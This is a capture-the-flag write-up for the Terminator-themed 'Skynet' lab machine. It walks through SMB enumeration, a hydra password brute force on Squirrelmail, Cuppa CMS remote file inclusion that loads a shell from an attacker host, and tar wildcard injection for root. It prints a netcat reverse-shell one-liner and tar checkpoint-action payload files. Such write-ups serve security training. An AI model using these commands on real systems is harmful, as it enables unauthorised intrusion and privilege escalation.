Skynet

intermediate55 minWriteup

A vulnerable Terminator themed machine

Learning Objectives

  • Enumerate Samba shares
  • Find email credentials
  • Exploit web vulnerability
  • Wildcard injection privesc

Skynet is a Terminator-themed machine featuring SMB enumeration, Squirrelmail exploitation, and tar wildcard injection for privilege escalation.

Walkthrough

bash
1606070;"># Step 1: Enumeration
2nmap -sV TARGET_IP
3606070;"># 22 SSH, 80 HTTP, 110 POP3, 139/445 SMB, 143 IMAP
4 
5606070;"># SMB enumeration
6smbclient -L 606070;">//TARGET_IP -N
7606070;"># Found: anonymous, milesdyson, IPC$
8 
9smbclient 606070;">//TARGET_IP/anonymous -N
10606070;"># Download: attention.txt, logs
11 
12cat attention.txt
13606070;"># Miles Dyson mentioned
14 
15cat log1.txt
16606070;"># Password list!
17 
18606070;"># Step 2: Squirrelmail Brute Force
19gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
20606070;"># Found: /squirrelmail
21 
22hydra -l milesdyson -P log1.txt TARGET_IP http-post-form 606070;">#a5d6ff;">"/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown user"
23606070;"># Found password!
24 
25606070;"># Step 3: Email Reveals SMB Password
26606070;"># Login to squirrelmail
27606070;"># Email contains: milesdyson SMB password
28 
29smbclient 606070;">//TARGET_IP/milesdyson -U milesdyson
30606070;"># Found: notes directory with important.txt
31606070;"># Contains: hidden directory /45kra24zxs28v3yd
32 
33606070;"># Step 4: Cuppa CMS RFI
34http:606070;">//TARGET_IP/45kra24zxs28v3yd/
35606070;"># Cuppa CMS - has Remote File Inclusion vulnerability!
36 
37searchsploit cuppa
38606070;"># RFI in alertConfigField.php
39 
40606070;"># Exploit:
41http:606070;">//TARGET_IP/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://YOUR_IP/shell.php
42 
43606070;"># Host shell and get reverse connection
44 
45606070;"># Step 5: Tar Wildcard Privesc
46cat /etc/crontab
47606070;"># root runs: tar cf /home/milesdyson/backups/backup.tgz *
48 
49606070;"># In /var/www/html (or cron target directory):
50echo 606070;">#a5d6ff;">'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 6666 >/tmp/f' > shell.sh
51echo 606070;">#a5d6ff;">"" > "--checkpoint-action=exec=sh shell.sh"
52echo 606070;">#a5d6ff;">"" > "--checkpoint=1"
53 
54606070;"># When cron runs: tar * expands to:
55606070;"># tar cf backup.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh ...
56 
57nc -lvnp 6666
58606070;"># Wait for cron - root shell!

Tar Wildcard Injection

When tar uses * on user-controlled files, create files named like tar arguments. tar --checkpoint-action=exec=cmd executes commands!

Knowledge Check

Quick Quiz
Question 1 of 1

What makes tar wildcard expansion dangerous?

Key Takeaways

  • SMB can reveal passwords in text files
  • Webmail may contain sensitive information
  • Hidden directories found in emails/files
  • Tar wildcard injection is a powerful privesc technique